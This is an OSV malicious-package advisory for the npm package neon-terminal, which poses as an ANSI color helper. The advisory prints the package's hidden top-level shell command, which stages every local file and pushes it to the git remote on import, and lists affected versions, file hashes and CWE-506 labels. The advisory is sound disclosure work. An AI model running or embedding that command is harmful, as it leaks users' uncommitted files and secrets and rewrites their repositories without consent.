MAL-2026-6793

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/neon-terminal/MAL-2026-6793.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6793
Published
2026-07-06T03:07:29Z
Modified
2026-07-06T03:31:40.167605907Z
Summary
Malicious code in neon-terminal (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fe8b090e304f95042a17db9e22edef03d8cdd073a214806e8aa3ebe7b2d138f9)

neon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on require('neon-terminal') or import 'neon-terminal'. The command runs pwd && ls -la && git status && git add. && git commit -m "sync" && git push -u origin main in the consumer's current working directory. When loaded inside a project that is a git repository, this stages every local file (including untracked/uncommitted files that may contain secrets, credentials, or in-progress code), creates a commit under the installer's git identity, and pushes to whatever origin remote is configured. The behavior is undocumented, ungated, and unrelated to the package's advertised purpose. Consequences on the installer: (1) unauthorized commits to the installer's repository under the installer's identity; (2) exfiltration of local, previously-uncommitted files to the configured remote (which may be a public or third-party-visible repo); (3) destructive mutation of git history / branch state without consent.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-07-06T03:12:34.469263609Z",
            "source": "amazon-inspector",
            "sha256": "7dd6cb5ae779e1f3c5e78cd62c7d4abce2254f01cadc465ae31a66c890d4aedc",
            "versions": [
                "0.3.0"
            ],
            "id": "IN-MAL-2026-007966",
            "modified_time": "2026-07-06T03:08:14Z"
        },
        {
            "import_time": "2026-07-06T03:12:34.368395179Z",
            "source": "amazon-inspector",
            "sha256": "a013b6f123489f4d4cde454e5fa9474d414c5d96ca2fb4b591bd3f251d965444",
            "versions": [
                "0.7.0"
            ],
            "id": "IN-MAL-2026-007963",
            "modified_time": "2026-07-06T03:07:46Z"
        },
        {
            "import_time": "2026-07-06T03:12:34.303936388Z",
            "source": "amazon-inspector",
            "sha256": "bf36bf768a99a85796b17f9326d27d12fddac725163d9055f64fd40f6e32db16",
            "versions": [
                "0.9.0"
            ],
            "id": "IN-MAL-2026-007962",
            "modified_time": "2026-07-06T03:07:38Z"
        },
        {
            "import_time": "2026-07-06T03:12:34.276346885Z",
            "source": "amazon-inspector",
            "sha256": "f2a8571e415ee8e20ec04bcf7fa8d689dc02840d931ff569a1f3ed72aa75e731",
            "versions": [
                "0.4.0"
            ],
            "id": "IN-MAL-2026-007961",
            "modified_time": "2026-07-06T03:07:29Z"
        },
        {
            "import_time": "2026-07-06T03:12:34.439804244Z",
            "source": "amazon-inspector",
            "sha256": "f4ef60c657027edd1662f32277b50604b6162461924cebd4ed71e3e73b1e87e5",
            "versions": [
                "0.6.0"
            ],
            "id": "IN-MAL-2026-007965",
            "modified_time": "2026-07-06T03:08:05Z"
        },
        {
            "import_time": "2026-07-06T03:12:34.396028078Z",
            "source": "amazon-inspector",
            "sha256": "fe20cb398df96930eff1a5c4f708fdf9b96c449f29958a6103bb2648a4e5b759",
            "versions": [
                "0.5.0"
            ],
            "id": "IN-MAL-2026-007964",
            "modified_time": "2026-07-06T03:07:56Z"
        },
        {
            "import_time": "2026-07-06T03:12:34.497658844Z",
            "source": "amazon-inspector",
            "sha256": "fe8b090e304f95042a17db9e22edef03d8cdd073a214806e8aa3ebe7b2d138f9",
            "versions": [
                "0.2.0"
            ],
            "id": "IN-MAL-2026-007967",
            "modified_time": "2026-07-06T03:08:22Z"
        }
    ]
}
References
Credits

Affected packages

npm / neon-terminal

Package

Affected ranges

Affected versions

0.*
0.2.0
0.3.0
0.4.0
0.5.0
0.6.0
0.7.0
0.9.0

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/neon-terminal/MAL-2026-6793.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "evidence_files": [
        {
            "tlsh": "554132e79de930110b9284b0e019a043abe959345113f2bcfcfaa6389fcd664c171fb4",
            "sha256": "f9fceeebc3cb72d79983c800770fb730f0a63c3d3e48b489b488f5efdb7e6a0f",
            "path": "cjs/src/index.js"
        },
        {
            "tlsh": "da4114eb9dd921100aa24474e419e003579d19346217f2bcfcfaa2385edc668c172fb8",
            "sha256": "72a4853d83ff776dd3ebd2fb692394a7042aa01d1c3e236fb619db221a92c186",
            "path": "src/index.js"
        },
        {
            "tlsh": "8201de11ccae0e2312c96a24dd5a4642d071882b4854be0e33ea527c4b9c9ef20fe75e",
            "sha256": "cccd6e4654b872c88d1271fd0a0ae213bbf5ff1aedffd8c79672060a78cca37e",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "neon-terminal-0.3.0.tgz",
            "hashes": {
                "sha1": "6d102bdda39373cbe2200f2acb2764ca42fe4a1c",
                "sha512_sri": "sha512-ccm8SwLkfJfFmwSZqGkquK/CIlfoJ74vTrOdjTZNVDHSAfxZjUTuf7aehP1mV7s9rnqrkoY/HktW4PSxntdSVA=="
            }
        }
    ]
}